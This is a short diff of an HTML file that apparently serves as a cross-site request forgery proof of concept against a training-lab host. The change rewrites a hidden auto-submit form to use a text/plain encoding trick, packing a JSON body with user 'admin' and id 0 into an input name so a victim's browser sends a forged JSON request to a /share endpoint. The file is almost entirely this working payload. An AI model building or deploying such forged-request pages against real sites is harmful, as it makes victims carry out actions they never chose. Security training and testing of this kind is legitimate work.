--- a/cs.html
+++ b/cs.html
@@ -1,9 +1,8 @@
 <html>
   <body>
   <script>history.pushState('', '', '/')</script>
-    <form action="http://ptl-c9610501-183db10e.libcurl.so/share" method="POST">
-      <input type="hidden" name="user" value="test" />
-      <input type="hidden" name="id" value="0" />
+    <form action="http://ptl-0764f291-b65a5a79.libcurl.so/share" method="POST" enctype="text/plain">
+      <input type="hidden" name="&#123;&quot;user&quot;&#58;&quot;admin&quot;&#44;&quot;id&quot;&#58;0&#125;" value="" />
       <input type="submit" value="Submit request" />
     </form>
     <script>
